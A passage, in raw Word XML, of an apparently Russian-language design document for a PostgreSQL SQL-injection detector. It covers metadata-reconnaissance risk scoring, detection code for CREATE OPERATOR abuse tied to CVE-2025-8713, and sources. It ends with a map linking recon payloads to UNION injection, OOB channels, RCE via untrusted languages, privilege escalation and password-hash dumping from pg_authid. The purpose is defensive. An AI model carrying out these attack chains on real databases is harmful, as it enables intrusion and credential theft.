          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["meta_recon_custom_op"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02058C0D"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29DA778F"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vulnerability_class=VulnerabilityClass.METADATA_RECON,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D298291" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=9,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C82C871" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="CREATE OPERATOR в application-сессии — возможный паттерн "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40509A1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "эксплуатации CVE-2025-8713 (обход view ACL / RLS через "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F34A571" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "custom operator в selectivity-оценщике).",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BBE3A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Удалите CREATE OPERATOR; операторы создаются только при "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30184977" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "установке расширений DBA-ролью.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC739FD"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2C087DFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Градация risk обоснована:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD6665E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (post-exploitation после superuser; в application нет use case).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28220FF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (узкие легитимные use case в application, чаще атака).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCB858B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (массово используются ORM/миграциями; сигнал в комбинации с другими маркерами SQL_INJECTION_CLASSIC). Решение об эскалации до критичной находки — оставить LLM-судье по совокупности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF0747" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OPERATOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (отдельная ветка, потому что это активное действие, а не чтение каталога).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78570A34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Порядок проверки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>high → mid → low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>elif</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> гарантирует, что для запроса вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сработает только high-ветка (риск 10), а не каскад из трёх finding-ов на одну строку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2F5DCF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Использованные источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E9DD9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2024-4317 утечка через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: PostgreSQL advisory, pganalyze (5-минутный разбор), документация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Критичный нюанс — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fix-CVE-2024-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4317.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обязателен после бинар-патча, особенно на managed-провайдерах, где автоматическое применение скрипта не гарантировано.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A6AE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2025-8713 обход ACL/RLS через custom operator в selectivity-оценщике: PostgreSQL advisory, GBHackers (август 2025). Полная цепочка — в 4.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72939D98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Общие:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy (SQLi cheat sheet, PostgreSQL section, fingerprinting + enumeration), HackTricks PostgreSQL Injection (general enumeration), PostgreSQL Docs (System Catalogs, System Views, System Information Functions, XML Functions, Predefined Roles), RFC 5802 (SCRAM для 3.8.3), hashcat documentation (hash modes 12 и 28600).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2411B839" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Перекрёстные ссылки на следующие категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D51AAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1.x (UNION-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.8.1/3.8.2 дают входные данные для 3.1: имена таблиц, колонок, типы. Без 3.8.1 атакующий не знает, что выбирать в UNION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486D52FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6 (OOB)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.8.4 Payload C показывает, какие OOB-каналы открыты (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t>). Без этого знания 3.6 — попытка вслепую.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25157C38" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7 (RCE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.8.4 Payload C показывает, доступны ли </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для языковых RCE из 3.7.2/3.7.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444B2EAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.1 (data-modifying CTE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.8.1 даёт имена пользовательских таблиц для WITH-INSERT/UPDATE/DELETE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134ACE36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.x (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.8.2 Payload A с фильтром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosecdef = true AND owner=postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — прямой источник целей для 3.13. После успешной 3.13 → 3.8.3 Payload B для дампа паролей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D5B0E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 (Identifier injection в plpgsql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.8.2 Payload B (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — источник кандидатов для 3.16: атакующий читает тела функций, ищет в них </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('%s', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE '...' || ...</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF06C1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17 (RLS bypass)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.8.3 Payload A (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles.rolbypassrls</w:t>
      </w:r>
      <w:r>
        <w:t>) — карта целевых ролей для SET ROLE bypass. 3.8.6 (R26 CVE-2025-8713) — частный случай того же класса CVE, который в 3.17.4 разбирается с точки зрения RLS-моделирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717007A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Раздел 4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server_version_num</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из 3.8.4 — ключ к версионным таблицам в 4.6. R17 и R26 целиком разбираются в 4.4/4.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E23BDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1EFE3A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Большая часть 3.8 работает на managed-PG так же, как на self-hosted — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> структурно открыт PUBLIC, провайдеры его не ограничивают (это сломало бы ORM и инструменты миграции). Что меняется:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330BBD6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.1 / 3.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — в выборке появляются служебные таблицы/функции провайдера (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqladmin.*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>supabase_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_graphql.*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgsodium.*</w:t>
      </w:r>
      <w:r>
        <w:t>) — это сам по себе fingerprint, какой провайдер хостит инстанс.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646EEDF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.3 Payload B (хеши)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>структурно недоступна</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на всех major-провайдерах. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqlsuperuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не имеют SUPERUSER-флага; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_all_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не выдаётся. Хеши паролей видны только провайдеру.</w:t>
      </w:r>
    </w:p>
